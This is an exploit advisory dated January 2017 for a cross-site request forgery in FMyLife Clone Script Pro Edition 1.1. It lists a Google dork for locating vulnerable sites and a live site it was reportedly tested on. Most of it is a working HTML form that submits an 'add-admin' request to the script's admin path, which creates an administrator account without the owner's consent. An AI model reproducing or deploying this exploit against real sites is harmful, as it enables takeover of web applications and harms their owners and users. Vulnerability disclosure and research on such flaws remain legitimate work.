FMyLife Clone Script Pro Edition 1.1 Cross Site Request Forgery
Posted on 11 January 2017
# # # # # # Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...) # Google Dork: FMyLife Clone Script # Date:10.01.2017 # Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm # Tested on: http://www.tellaboutit.com/admin/ # Script Name: FMyLife Clone Script (Pro Edition) # Script Version: 1.1 # Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/ # Author: Ihsan Sencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # #Exploit : <html> <body> <h2>Add an Administrator</h2> <form action="http://localhost/[PATH]/admin/" method="post"> <div id="add-admin-form"> <input type="hidden" name="action" value="add-admin" /> <label for="username">Username:</label> <input type="text" id="username" name="admin-username" value="" /> <div class="spacer"></div> <label for="password">Password:</label> <input type="password" id="password" name="admin-password" value="" /> <div class="spacer"></div> <input type="image" src="add-administrator.png" name="add-admin" id="add-admin" value="Add Administrator" /> </div> </form> </body> </html> # # # # #
